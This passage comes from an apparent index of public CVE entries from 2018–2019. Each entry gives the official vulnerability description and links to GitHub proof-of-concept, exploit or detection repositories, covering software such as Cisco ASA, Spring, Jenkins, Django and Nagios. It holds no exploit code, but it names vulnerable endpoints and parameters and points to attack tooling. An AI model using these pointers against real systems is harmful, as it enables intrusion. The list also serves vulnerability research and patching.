emfd in Ruckus Wireless Unleashed through 200.7.10.102.64 allows remote attackers to execute OS commands via a POST request with the attribute xcmd=spectra-analysis to admin/_cmdstat.jsp via the mac attribute.

- [bdunlap9/CVE-2019-19842](https://github.com/bdunlap9/CVE-2019-19842)

### CVE-2019-19844 (2019-12-18)

Django before 1.11.27, 2.x before 2.2.9, and 3.x before 3.0.1 allows account takeover. A suitably crafted email address (that is equal to an existing user's email address after case transformation of Unicode characters) would allow an attacker to be sent a password reset token for the matched user account. (One mitigation in the new releases is to send password reset tokens only to the registered user email address.)

- [ryu22e/django_cve_2019_19844_poc](https://github.com/ryu22e/django_cve_2019_19844_poc)
- [andripwn/django_cve201919844](https://github.com/andripwn/django_cve201919844)
- [0xsha/CVE_2019_19844](https://github.com/0xsha/CVE_2019_19844)

### CVE-2019-19871
- [VDISEC/CVE-2019-19871-AuditGuide](https://github.com/VDISEC/CVE-2019-19871-AuditGuide)

### CVE-2019-19905 (2019-12-19)

NetHack 3.6.x before 3.6.4 is prone to a buffer overflow vulnerability when reading very long lines from configuration files. This affects systems that have NetHack installed suid/sgid, and shared systems that allow users to upload their own configuration files.

- [dpmdpm2/CVE-2019-19905](https://github.com/dpmdpm2/CVE-2019-19905)

### CVE-2019-19919 (2019-12-20)

Versions of handlebars prior to 4.3.0 are vulnerable to Prototype Pollution leading to Remote Code Execution. Templates may alter an Object's __proto__ and __defineGetter__ properties, which may allow an attacker to execute arbitrary code through crafted payloads.

- [fazilbaig1/CVE-2019-19919](https://github.com/fazilbaig1/CVE-2019-19919)

### CVE-2019-19945 (2020-03-16)

uhttpd in OpenWrt through 18.06.5 and 19.x through 19.07.0-rc2 has an integer signedness error. This leads to out-of-bounds access to a heap buffer and a subsequent crash. It can be triggered with an HTTP POST request to a CGI script, specifying both "Transfer-Encoding: chunked" and a large negative Content-Length value.

- [delicateByte/CVE-2019-19945_Test](https://github.com/delicateByte/CVE-2019-19945_Test)

### CVE-2019-20059 (2020-02-10)

payment_manage.ajax.php and various *_manage.ajax.php in MFScripts YetiShare 3.5.2 through 4.5.4 directly insert values from the sSortDir_0 parameter into a SQL string. This allows an attacker to inject their own SQL and manipulate the query, typically extracting data from the database, aka SQL Injection. NOTE: this issue exists because of an incomplete fix for CVE-2019-19732.

- [cve-vuln/CVE-2019-20059](https://github.com/cve-vuln/CVE-2019-20059)

### CVE-2019-20085 (2019-12-30)

TVT NVMS-1000 devices allow GET /.. directory traversal.

- [AleDiBen/NVMS1000-Exploit](https://github.com/AleDiBen/NVMS1000-Exploit)

### CVE-2019-20197 (2019-12-31)

In Nagios XI 5.6.9, an authenticated user is able to execute arbitrary OS commands via shell metacharacters in the id parameter to schedulereport.php, in the context of the web-server user account.

- [lp008/CVE-2019-20197](https://github.com/lp008/CVE-2019-20197)
- [jas502n/CVE-2019-20197](https://github.com/jas502n/CVE-2019-20197)

### CVE-2019-20224 (2020-01-09)

netflow_get_stats in functions_netflow.php in Pandora FMS 7.0NG allows remote authenticated users to execute arbitrary OS commands via shell metacharacters in the ip_src parameter in an index.php?operation/netflow/nf_live_view request. This issue has been fixed in Pandora FMS 7.0 NG 742.

- [mhaskar/CVE-2019-20224](https://github.com/mhaskar/CVE-2019-20224)

### CVE-2019-20326 (2020-03-16)

A heap-based buffer overflow in _cairo_image_surface_create_from_jpeg() in extensions/cairo_io/cairo-image-surface-jpeg.c in GNOME gThumb before 3.8.3 and Linux Mint Pix before 2.4.5 allows attackers to cause a crash and potentially execute arbitrary code via a crafted JPEG file.

- [Fysac/CVE-2019-20326](https://github.com/Fysac/CVE-2019-20326)

### CVE-2019-20361 (2020-01-08)

There was a flaw in the WordPress plugin, Email Subscribers & Newsletters before 4.3.1, that allowed SQL statements to be passed to the database in the hash parameter (a blind SQL injection vulnerability).

- [jerrylewis9/CVE-2019-20361-EXPLOIT](https://github.com/jerrylewis9/CVE-2019-20361-EXPLOIT)

### CVE-2019-20372 (2020-01-09)

NGINX before 1.17.7, with certain error_page configurations, allows HTTP request smuggling, as demonstrated by the ability of an attacker to read unauthorized web pages in environments where NGINX is being fronted by a load balancer.

- [vuongnv3389-sec/CVE-2019-20372](https://github.com/vuongnv3389-sec/CVE-2019-20372)
- [0xleft/CVE-2019-20372](https://github.com/0xleft/CVE-2019-20372)

### CVE-2019-20933 (2020-11-19)

InfluxDB before 1.7.6 has an authentication bypass vulnerability in the authenticate function in services/httpd/handler.go because a JWT token may have an empty SharedSecret (aka shared secret).

- [LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933](https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933)
- [Hydragyrum/CVE-2019-20933](https://github.com/Hydragyrum/CVE-2019-20933)

### CVE-2019-25024 (2021-02-19)

OpenRepeater (ORP) before 2.2 allows unauthenticated command injection via shell metacharacters in the functions/ajax_system.php post_service parameter.

- [codexlynx/CVE-2019-25024](https://github.com/codexlynx/CVE-2019-25024)

### CVE-2019-25137 (2023-05-18)

Umbraco CMS 4.11.8 through 7.15.10, and 7.12.4, allows Remote Code Execution by authenticated administrators via msxsl:script in an xsltSelection to developer/Xslt/xsltVisualize.aspx.

- [Ickarah/CVE-2019-25137-Version-Research](https://github.com/Ickarah/CVE-2019-25137-Version-Research)

### CVE-2019-48814
- [wucj001/cve-2019-48814](https://github.com/wucj001/cve-2019-48814)

### CVE-2019-1002101 (2019-04-01)

The kubectl cp command allows copying files between containers and the user machine. To copy files from a container, Kubernetes creates a tar inside the container, copies it over the network, and kubectl unpacks it on the user’s machine. If the tar binary in the container is malicious, it could run any code and output unexpected, malicious results. An attacker could use this to write files to any path on the user’s machine when kubectl cp is called, limited only by the system permissions of the local user. The untar function can both create and follow symbolic links. The issue is resolved in kubectl v1.11.9, v1.12.7, v1.13.5, and v1.14.0.

- [brompwnie/CVE-2019-1002101-Helpers](https://github.com/brompwnie/CVE-2019-1002101-Helpers)

### CVE-2019-1003000 (2019-01-22)

A sandbox bypass vulnerability exists in Script Security Plugin 1.49 and earlier in src/main/java/org/jenkinsci/plugins/scriptsecurity/sandbox/groovy/GroovySandbox.java that allows attackers with the ability to provide sandboxed scripts to execute arbitrary code on the Jenkins master JVM.

- [wetw0rk/Exploit-Development](https://github.com/wetw0rk/Exploit-Development)
- [adamyordan/cve-2019-1003000-jenkins-rce-poc](https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc)
- [slowmistio/CVE-2019-1003000-and-CVE-2018-1999002-Pre-Auth-RCE-Jenkins](https://github.com/slowmistio/CVE-2019-1003000-and-CVE-2018-1999002-Pre-Auth-RCE-Jenkins)
- [1NTheKut/CVE-2019-1003000_RCE-DETECTION](https://github.com/1NTheKut/CVE-2019-1003000_RCE-DETECTION)
- [purple-WL/Jenkins_CVE-2019-1003000](https://github.com/purple-WL/Jenkins_CVE-2019-1003000)

### CVE-2019-1010054 (2019-07-18)

Dolibarr 7.0.0 is affected by: Cross Site Request Forgery (CSRF). The impact is: allow malicious HTML to change user password, disable users and disable password encryption. The component is: Function User password change, user disable and password encryption. The attack vector is: admin access malicious URLs.

- [chaizeg/CSRF-breach](https://github.com/chaizeg/CSRF-breach)

### CVE-2019-1010268 (2019-07-18)

Ladon since 0.6.1 (since ebef0aae48af78c159b6fce81bc6f5e7e0ddb059) is affected by: XML External Entity (XXE). The impact is: Information Disclosure, reading files and reaching internal network endpoints. The component is: SOAP request handlers. For instance: https://bitbucket.org/jakobsg/ladon/src/42944fc012a3a48214791c120ee5619434505067/src/ladon/interfaces/soap.py#lines-688. The attack vector is: Send a specially crafted SOAP call.

- [Tonyynot14/CVE-2019-1010268](https://github.com/Tonyynot14/CVE-2019-1010268)

### CVE-2019-1010298 (2019-07-15)

Linaro/OP-TEE OP-TEE 3.3.0 and earlier is affected by: Buffer Overflow. The impact is: Code execution in the context of TEE core (kernel). The component is: optee_os. The fixed version is: 3.4.0 and later.

- [RKX1209/CVE-2019-1010298](https://github.com/RKX1209/CVE-2019-1010298)

### CVE-2019-1020010 (2019-07-29)

Misskey before 10.102.4 allows hijacking a user's token.

- [DXY0411/CVE-2019-1020010](https://github.com/DXY0411/CVE-2019-1020010)

## 2018
### CVE-2018-0101 (2018-01-29)

A vulnerability in the Secure Sockets Layer (SSL) VPN functionality of the Cisco Adaptive Security Appliance (ASA) Software could allow an unauthenticated, remote attacker to cause a reload of the affected system or to remotely execute code. The vulnerability is due to an attempt to double free a region of memory when the webvpn feature is enabled on the Cisco ASA device. An attacker could exploit this vulnerability by sending multiple, crafted XML packets to a webvpn-configured interface on the affected system. An exploit could allow the attacker to execute arbitrary code and obtain full control of the system, or cause a reload of the affected device. This vulnerability affects Cisco ASA Software that is running on the following Cisco products: 3000 Series Industrial Security Appliance (ISA), ASA 5500 Series Adaptive Security Appliances, ASA 5500-X Series Next-Generation Firewalls, ASA Services Module for Cisco Catalyst 6500 Series Switches and Cisco 7600 Series Routers, ASA 1000V Cloud Firewall, Adaptive Security Virtual Appliance (ASAv), Firepower 2100 Series Security Appliance, Firepower 4110 Security Appliance, Firepower 9300 ASA Security Module, Firepower Threat Defense Software (FTD). Cisco Bug IDs: CSCvg35618.

- [1337g/CVE-2018-0101-DOS-POC](https://github.com/1337g/CVE-2018-0101-DOS-POC)
- [Cymmetria/ciscoasa_honeypot](https://github.com/Cymmetria/ciscoasa_honeypot)
- [MikeHorn-git/CVE-2018-0101](https://github.com/MikeHorn-git/CVE-2018-0101)

### CVE-2018-0114 (2018-01-04)

A vulnerability in the Cisco node-jose open source library before 0.11.0 could allow an unauthenticated, remote attacker to re-sign tokens using a key that is embedded within the token. The vulnerability is due to node-jose following the JSON Web Signature (JWS) standard for JSON Web Tokens (JWTs). This standard specifies that a JSON Web Key (JWK) representing a public key can be embedded within the header of a JWS. This public key is then trusted for verification. An attacker could exploit this by forging valid JWS objects by removing the original signature, adding a new public key to the header, and then signing the object using the (attacker-owned) private key associated with the public key embedded in that JWS header.

- [zi0Black/POC-CVE-2018-0114](https://github.com/zi0Black/POC-CVE-2018-0114)
- [Logeirs/CVE-2018-0114](https://github.com/Logeirs/CVE-2018-0114)
- [adityathebe/POC-CVE-2018-0114](https://github.com/adityathebe/POC-CVE-2018-0114)
- [Eremiel/CVE-2018-0114](https://github.com/Eremiel/CVE-2018-0114)
- [Starry-lord/CVE-2018-0114](https://github.com/Starry-lord/CVE-2018-0114)
- [scumdestroy/CVE-2018-0114](https://github.com/scumdestroy/CVE-2018-0114)
- [j4k0m/CVE-2018-0114](https://github.com/j4k0m/CVE-2018-0114)
- [mmeza-developer/CVE-2018-0114](https://github.com/mmeza-developer/CVE-2018-0114)
- [Pandora-research/CVE-2018-0114-Exploit](https://github.com/Pandora-research/CVE-2018-0114-Exploit)
- [amr9k8/jwt-spoof-tool](https://github.com/amr9k8/jwt-spoof-tool)

### CVE-2018-0171 (2018-03-28)

A vulnerability in the Smart Install feature of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to trigger a reload of an affected device, resulting in a denial of service (DoS) condition, or to execute arbitrary code on an affected device. The vulnerability is due to improper validation of packet data. An attacker could exploit this vulnerability by sending a crafted Smart Install message to an affected device on TCP port 4786. A successful exploit could allow the attacker to cause a buffer overflow on the affected device, which could have the following impacts: Triggering a reload of the device, Allowing the attacker to execute arbitrary code on the device, Causing an indefinite loop on the affected device that triggers a watchdog crash. Cisco Bug IDs: CSCvg76186.

- [AlrikRr/Cisco-Smart-Exploit](https://github.com/AlrikRr/Cisco-Smart-Exploit)

### CVE-2018-0202 (2018-03-27)

clamscan in ClamAV before 0.99.4 contains a vulnerability that could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. The vulnerability is due to improper input validation checking mechanisms when handling Portable Document Format (.pdf) files sent to an affected device. An unauthenticated, remote attacker could exploit this vulnerability by sending a crafted .pdf file to an affected device. This action could cause an out-of-bounds read when ClamAV scans the malicious file, allowing the attacker to cause a DoS condition. This concerns pdf_parse_array and pdf_parse_string in libclamav/pdfng.c. Cisco Bug IDs: CSCvh91380, CSCvh91400.

- [jaychowjingjie/CVE-2018-0202](https://github.com/jaychowjingjie/CVE-2018-0202)

### CVE-2018-0208 (2018-03-08)

A vulnerability in the web-based management interface of the (cloud based) Cisco Registered Envelope Service could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web-based management interface of the affected service. The vulnerability is due to insufficient validation of user-supplied input that is processed by the web-based management interface of the affected service. An attacker could exploit this vulnerability by persuading a user of the interface to click a malicious link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or access sensitive browser-based information. Cisco Bug IDs: CSCvg74126.

- [dima5455/Cve-2018-0208](https://github.com/dima5455/Cve-2018-0208)

### CVE-2018-0296 (2018-06-07)

A vulnerability in the web interface of the Cisco Adaptive Security Appliance (ASA) could allow an unauthenticated, remote attacker to cause an affected device to reload unexpectedly, resulting in a denial of service (DoS) condition. It is also possible on certain software releases that the ASA will not reload, but an attacker could view sensitive system information without authentication by using directory traversal techniques. The vulnerability is due to lack of proper input validation of the HTTP URL. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. An exploit could allow the attacker to cause a DoS condition or unauthenticated disclosure of information. This vulnerability applies to IPv4 and IPv6 HTTP traffic. This vulnerability affects Cisco ASA Software and Cisco Firepower Threat Defense (FTD) Software that is running on the following Cisco products: 3000 Series Industrial Security Appliance (ISA), ASA 1000V Cloud Firewall, ASA 5500 Series Adaptive Security Appliances, ASA 5500-X Series Next-Generation Firewalls, ASA Services Module for Cisco Catalyst 6500 Series Switches and Cisco 7600 Series Routers, Adaptive Security Virtual Appliance (ASAv), Firepower 2100 Series Security Appliance, Firepower 4100 Series Security Appliance, Firepower 9300 ASA Security Module, FTD Virtual (FTDv). Cisco Bug IDs: CSCvi16029.

- [milo2012/CVE-2018-0296](https://github.com/milo2012/CVE-2018-0296)
- [yassineaboukir/CVE-2018-0296](https://github.com/yassineaboukir/CVE-2018-0296)
- [bhenner1/CVE-2018-0296](https://github.com/bhenner1/CVE-2018-0296)
- [qiantu88/CVE-2018-0296](https://github.com/qiantu88/CVE-2018-0296)

### CVE-2018-0708 (2018-07-16)

Command injection vulnerability in networking of QNAP Q'center Virtual Appliance version 1.7.1063 and earlier could allow authenticated users to run arbitrary commands.

- [ntkernel0/CVE-2019-0708](https://github.com/ntkernel0/CVE-2019-0708)

### CVE-2018-0798 (2018-01-10)

Equation Editor in Microsoft Office 2007, Microsoft Office 2010, Microsoft Office 2013, and Microsoft Office 2016 allows a remote code execution vulnerability due to the way objects are handled in memory, aka "Microsoft Office Memory Corruption Vulnerability".

- [Sunqiz/CVE-2018-0798-reproduction](https://github.com/Sunqiz/CVE-2018-0798-reproduction)

### CVE-2018-0802 (2018-01-10)

Equation Editor in Microsoft Office 2007, Microsoft Office 2010, Microsoft Office 2013, and Microsoft Office 2016 allows a remote code execution vulnerability due to the way objects are handled in memory, aka "Microsoft Office Memory Corruption Vulnerability". This CVE is unique from CVE-2018-0797 and CVE-2018-0812.

- [zldww2011/CVE-2018-0802_POC](https://github.com/zldww2011/CVE-2018-0802_POC)
- [rxwx/CVE-2018-0802](https://github.com/rxwx/CVE-2018-0802)
- [Ridter/RTF_11882_0802](https://github.com/Ridter/RTF_11882_0802)
- [likekabin/CVE-2018-0802_CVE-2017-11882](https://github.com/likekabin/CVE-2018-0802_CVE-2017-11882)
- [roninAPT/CVE-2018-0802](https://github.com/roninAPT/CVE-2018-0802)
- [Abdibimantara/Maldoc-Analysis](https://github.com/Abdibimantara/Maldoc-Analysis)

### CVE-2018-0824 (2018-05-09)

A remote code execution vulnerability exists in "Microsoft COM for Windows" when it fails to properly handle serialized objects, aka "Microsoft COM for Windows Remote Code Execution Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers.

- [codewhitesec/UnmarshalPwn](https://github.com/codewhitesec/UnmarshalPwn)

### CVE-2018-0834 (2018-02-15)

Microsoft Edge and ChakraCore in Microsoft Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows remote code execution, due to how the scripting engine handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2018-0835, CVE-2018-0836, CVE-2018-0837, CVE-2018-0838, CVE-2018-0840, CVE-2018-0856, CVE-2018-0857, CVE-2018-0858, CVE-2018-0859, CVE-2018-0860, CVE-2018-0861, and CVE-2018-0866.

- [SpiralBL0CK/-CVE-2018-0834-aab-aar](https://github.com/SpiralBL0CK/-CVE-2018-0834-aab-aar)

### CVE-2018-0886 (2018-03-14)

The Credential Security Support Provider protocol (CredSSP) in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1 and RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703, and 1709, Windows Server 2016 and Windows Server, version 1709 allows a remote code execution vulnerability due to how CredSSP validates requests during the authentication process, aka "CredSSP Remote Code Execution Vulnerability".

- [preempt/credssp](https://github.com/preempt/credssp)

### CVE-2018-0952 (2018-08-15)

An Elevation of Privilege vulnerability exists when Diagnostics Hub Standard Collector allows file creation in arbitrary locations, aka "Diagnostic Hub Standard Collector Elevation Of Privilege Vulnerability." This affects Windows Server 2016, Windows 10, Microsoft Visual Studio, Windows 10 Servers.

- [atredispartners/CVE-2018-0952-SystemCollector](https://github.com/atredispartners/CVE-2018-0952-SystemCollector)

### CVE-2018-0959 (2018-05-09)

A remote code execution vulnerability exists when Windows Hyper-V on a host server fails to properly validate input from an authenticated user on a guest operating system, aka "Hyper-V Remote Code Execution Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers.

- [pwndorei/CVE-2018-0959](https://github.com/pwndorei/CVE-2018-0959)

### CVE-2018-14
- [lckJack/legacySymfony](https://github.com/lckJack/legacySymfony)

### CVE-2018-1010 (2018-04-12)

A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts, aka "Microsoft Graphics Remote Code Execution Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers. This CVE ID is unique from CVE-2018-1012, CVE-2018-1013, CVE-2018-1015, CVE-2018-1016.

- [ymgh96/Detecting-the-patch-of-CVE-2018-1010](https://github.com/ymgh96/Detecting-the-patch-of-CVE-2018-1010)

### CVE-2018-1026 (2018-04-12)

A remote code execution vulnerability exists in Microsoft Office software when the software fails to properly handle objects in memory, aka "Microsoft Office Remote Code Execution Vulnerability." This affects Microsoft Office. This CVE ID is unique from CVE-2018-1030.

- [ymgh96/Detecting-the-CVE-2018-1026-and-its-patch](https://github.com/ymgh96/Detecting-the-CVE-2018-1026-and-its-patch)

### CVE-2018-1042 (2018-01-22)

Moodle 3.x has Server Side Request Forgery in the filepicker.

- [UDPsycho/Moodle-CVE-2018-1042](https://github.com/UDPsycho/Moodle-CVE-2018-1042)

### CVE-2018-1088 (2018-04-18)

A privilege escalation flaw was found in gluster 3.x snapshot scheduler. Any gluster client allowed to mount gluster volumes could also mount shared gluster storage volume and escalate privileges by scheduling malicious cronjob via symlink.

- [MauroEldritch/GEVAUDAN](https://github.com/MauroEldritch/GEVAUDAN)

### CVE-2018-1111 (2018-05-17)

DHCP packages in Red Hat Enterprise Linux 6 and 7, Fedora 28, and earlier are vulnerable to a command injection flaw in the NetworkManager integration script included in the DHCP client. A malicious DHCP server, or an attacker on the local network able to spoof DHCP responses, could use this flaw to execute arbitrary commands with root privileges on systems using NetworkManager and configured to obtain network configuration using the DHCP protocol.

- [knqyf263/CVE-2018-1111](https://github.com/knqyf263/CVE-2018-1111)
- [kkirsche/CVE-2018-1111](https://github.com/kkirsche/CVE-2018-1111)
- [baldassarreFe/FEP3370-advanced-ethical-hacking](https://github.com/baldassarreFe/FEP3370-advanced-ethical-hacking)

### CVE-2018-1123 (2018-05-23)

procps-ng before version 3.3.15 is vulnerable to a denial of service in ps via mmap buffer overflow. Inbuilt protection in ps maps a guard page at the end of the overflowed buffer, ensuring that the impact of this flaw is limited to a crash (temporary denial of service).

- [aravinddathd/CVE-2018-1123](https://github.com/aravinddathd/CVE-2018-1123)

### CVE-2018-1133 (2018-05-25)

An issue was discovered in Moodle 3.x. A Teacher creating a Calculated question can intentionally cause remote code execution on the server, aka eval injection.

- [darrynten/MoodleExploit](https://github.com/darrynten/MoodleExploit)
- [Feidao-fei/MOODLE-3.X-Remote-Code-Execution](https://github.com/Feidao-fei/MOODLE-3.X-Remote-Code-Execution)
- [That-Guy-Steve/CVE-2018-1133-Exploit](https://github.com/That-Guy-Steve/CVE-2018-1133-Exploit)

### CVE-2018-1160 (2018-12-20)

Netatalk before 3.1.12 is vulnerable to an out of bounds write in dsi_opensess.c. This is due to lack of bounds checking on attacker controlled data. A remote unauthenticated attacker can leverage this vulnerability to achieve arbitrary code execution.

- [SachinThanushka/CVE-2018-1160](https://github.com/SachinThanushka/CVE-2018-1160)

### CVE-2018-1207 (2018-03-23)

Dell EMC iDRAC7/iDRAC8, versions prior to 2.52.52.52, contain a CGI injection vulnerability which could be used to execute remote code. A remote unauthenticated attacker may potentially be able to use CGI variables to execute remote code.

- [mgargiullo/cve-2018-1207](https://github.com/mgargiullo/cve-2018-1207)
- [un4gi/CVE-2018-1207](https://github.com/un4gi/CVE-2018-1207)

### CVE-2018-1235 (2018-05-29)

Dell EMC RecoverPoint versions prior to 5.1.2 and RecoverPoint for VMs versions prior to 5.1.1.3, contain a command injection vulnerability. An unauthenticated remote attacker may potentially exploit this vulnerability to execute arbitrary commands on the affected system with root privilege.

- [AbsoZed/CVE-2018-1235](https://github.com/AbsoZed/CVE-2018-1235)

### CVE-2018-1259 (2018-05-11)

Spring Data Commons, versions 1.13 prior to 1.13.12 and 2.0 prior to 2.0.7, used in combination with XMLBeam 1.4.14 or earlier versions, contains a property binder vulnerability caused by improper restriction of XML external entity references as underlying library XMLBeam does not restrict external reference expansion. An unauthenticated remote malicious user can supply specially crafted request parameters against Spring Data's projection-based request payload binding to access arbitrary files on the system.

- [tafamace/CVE-2018-1259](https://github.com/tafamace/CVE-2018-1259)

### CVE-2018-1263 (2018-05-15)

Addresses partial fix in CVE-2018-1261. Pivotal spring-integration-zip, versions prior to 1.0.2, exposes an arbitrary file write vulnerability, that can be achieved using a specially crafted zip archive (affects other archives as well, bzip2, tar, xz, war, cpio, 7z), that holds path traversal filenames. So when the filename gets concatenated to the target extraction directory, the final path ends up outside of the target folder.

- [sakib570/CVE-2018-1263-Demo](https://github.com/sakib570/CVE-2018-1263-Demo)

### CVE-2018-1270 (2018-04-06)

Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, allow applications to expose STOMP over WebSocket endpoints with a simple, in-memory STOMP broker through the spring-messaging module. A malicious user (or attacker) can craft a message to the broker that can lead to a remote code execution attack.

- [CaledoniaProject/CVE-2018-1270](https://github.com/CaledoniaProject/CVE-2018-1270)
- [genxor/CVE-2018-1270_EXP](https://github.com/genxor/CVE-2018-1270_EXP)
- [tafamace/CVE-2018-1270](https://github.com/tafamace/CVE-2018-1270)
- [Venscor/CVE-2018-1270](https://github.com/Venscor/CVE-2018-1270)
- [mprunet/owasp-formation-cve-2018-1270](https://github.com/mprunet/owasp-formation-cve-2018-1270)

### CVE-2018-1273 (2018-04-11)

Spring Data Commons, versions prior to 1.13 to 1.13.10, 2.0 to 2.0.5, and older unsupported versions, contain a property binder vulnerability caused by improper neutralization of special elements. An unauthenticated remote malicious user (or attacker) can supply specially crafted request parameters against Spring Data REST backed HTTP resources or using Spring Data's projection-based request payload binding that can lead to a remote code execution attack.

- [knqyf263/CVE-2018-1273](https://github.com/knqyf263/CVE-2018-1273)
- [wearearima/poc-cve-2018-1273](https://github.com/wearearima/poc-cve-2018-1273)
- [webr0ck/poc-cve-2018-1273](https://github.com/webr0ck/poc-cve-2018-1273)
- [cved-sources/cve-2018-1273](https://github.com/cved-sources/cve-2018-1273)
- [jas502n/cve-2018-1273](https://github.com/jas502n/cve-2018-1273)

### CVE-2018-1285 (2020-05-11)

Apache log4net versions before 2.0.10 do not disable XML external entities when parsing log4net configuration files. This allows for XXE-based attacks in applications that accept attacker-controlled log4net configuration files.

- [alex-ermolaev/Log4NetSolarWindsSNMP-](https://github.com/alex-ermolaev/Log4NetSolarWindsSNMP-)

### CVE-2018-1288 (2018-07-26)

In Apache Kafka 0.9.0.0 to 0.9.0.1, 0.10.0.0 to 0.10.2.1, 0.11.0.0 to 0.11.0.2, and 1.0.0, authenticated Kafka users may perform actions reserved for the Broker via a manually created fetch request interfering with data replication, resulting in data loss.

- [joegallagher4/CVE-2018-1288-](https://github.com/joegallagher4/CVE-2018-1288-)

### CVE-2018-1297 (2018-02-13)

When using Distributed Test only (RMI based), Apache JMeter 2.x and 3.x uses an unsecured RMI connection. This could allow an attacker to get access to JMeterEngine and send unauthorized code.

- [Al1ex/CVE-2018-1297](https://github.com/Al1ex/CVE-2018-1297)
- [48484848484848/Jmeter-CVE-2018-1297-](https://github.com/48484848484848/Jmeter-CVE-2018-1297-)

### CVE-2018-1304 (2018-02-28)

The URL pattern of "" (the empty string) which exactly maps to the context root was not correctly handled in Apache Tomcat 9.0.0.M1 to 9.0.4, 8.5.0 to 8.5.27, 8.0.0.RC1 to 8.0.49 and 7.0.0 to 7.0.84 when used as part of a security constraint definition. This caused the constraint to be ignored. It was, therefore, possible for unauthorised users to gain access to web application resources that should have been protected. Only security constraints with a URL pattern of the empty string were affected.

- [knqyf263/CVE-2018-1304](https://github.com/knqyf263/CVE-2018-1304)
- [thariyarox/tomcat_CVE-2018-1304_testing](https://github.com/thariyarox/tomcat_CVE-2018-1304_testing)

### CVE-2018-1305 (2018-02-23)

Security constraints defined by annotations of Servlets in Apache Tomcat 9.0.0.M1 to 9.0.4, 8.5.0 to 8.5.27, 8.0.0.RC1 to 8.0.49 and 7.0.0 to 7.0.84 were only applied once a Servlet had been loaded. Because security constraints defined in this way apply to the URL pattern and any URLs below that point, it was possible - depending on the order Servlets were loaded - for some security constraints not to be applied. This could have exposed resources to users who were not authorised to access them.

- [Pa55w0rd/CVE-2018-1305](https://github.com/Pa55w0rd/CVE-2018-1305)

### CVE-2018-1306 (2018-06-27)

The PortletV3AnnotatedDemo Multipart Portlet war file code provided in Apache Pluto version 3.0.0 could allow a remote attacker to obtain sensitive information, caused by the failure to restrict path information provided during a file upload. An attacker could exploit this vulnerability to obtain configuration data and other sensitive information.

- [JJSO12/Apache-Pluto-3.0.0--CVE-2018-1306](https://github.com/JJSO12/Apache-Pluto-3.0.0--CVE-2018-1306)

### CVE-2018-1311 (2019-12-18)

The Apache Xerces-C 3.0.0 to 3.2.3 XML parser contains a use-after-free error triggered during the scanning of external DTDs. This flaw has not been addressed in the maintained version of the library and has no current mitigation other than to disable DTD processing. This can be accomplished via the DOM using a standard parser feature, or via SAX using the XERCES_DISABLE_DTD environment variable.

- [johnjamesmccann/xerces-3.2.3-DTD-hotfix](https://github.com/johnjamesmccann/xerces-3.2.3-DTD-hotfix)

### CVE-2018-1313 (2018-05-07)

In Apache Derby 10.3.1.4 to 10.14.1.0, a specially-crafted network packet can be used to request the Derby Network Server to boot a database whose location and contents are under the user's control. If the Derby Network Server is not running with a Java Security Manager policy file, the attack is successful. If the server is using a policy file, the policy file must permit the database location to be read for the attack to work. The default Derby Network Server policy file distributed with the affected releases includes a permissive policy as the default Network Server policy, which allows the attack to work.

- [tafamace/CVE-2018-1313](https://github.com/tafamace/CVE-2018-1313)

### CVE-2018-1324 (2018-03-16)

A specially crafted ZIP archive can be used to cause an infinite loop inside of Apache Commons Compress' extra field parser used by the ZipFile and ZipArchiveInputStream classes in versions 1.11 to 1.15. This can be used to mount a denial of service attack against services that use Compress' zip package.

- [tafamace/CVE-2018-1324](https://github.com/tafamace/CVE-2018-1324)

### CVE-2018-1335 (2018-04-25)

From Apache Tika versions 1.7 to 1.17, clients could send carefully crafted headers to tika-server that could be used to inject commands into the command line of the server running tika-server. This vulnerability only affects those running tika-server on a server that is open to untrusted clients. The mitigation is to upgrade to Tika 1.18.

- [SkyBlueEternal/CVE-2018-1335-EXP-GUI](https://github.com/SkyBlueEternal/CVE-2018-1335-EXP-GUI)
- [N0b1e6/CVE-2018-1335-Python3](https://github.com/N0b1e6/CVE-2018-1335-Python3)
- [canumay/cve-2018-1335](https://github.com/canumay/cve-2018-1335)
- [siramk/CVE-2018-1335](https://github.com/siramk/CVE-2018-1335)
- [DigitalNinja00/CVE-2018-1335](https://github.com/DigitalNinja00/CVE-2018-1335)

### CVE-2018-1932 (2019-01-08)

IBM API Connect 5.0.0.0 through 5.0.8.4 is affected by a vulnerability in the role-based access control in the management server that could allow an authenticated user to obtain highly sensitive information. IBM X-Force ID: 153175.

- [BKreisel/CVE-2018-1932X](https://github.com/BKreisel/CVE-2018-1932X)

### CVE-2018-2380 (2018-03-01)

SAP CRM 7.01, 7.02, 7.30, 7.31, 7.33, 7.54 allows an attacker to exploit insufficient validation of path information provided by users, thus characters representing "traverse to parent directory" are passed through to the file APIs.

- [erpscanteam/CVE-2018-2380](https://github.com/erpscanteam/CVE-2018-2380)

### CVE-2018-2392 (2018-02-14)

Under certain conditions SAP Internet Graphics Server (IGS) 7.20, 7.20EXT, 7.45, 7.49, 7.53, fails to validate XML External Entity appropriately causing the SAP Internet Graphics Server (IGS) to become unavailable.

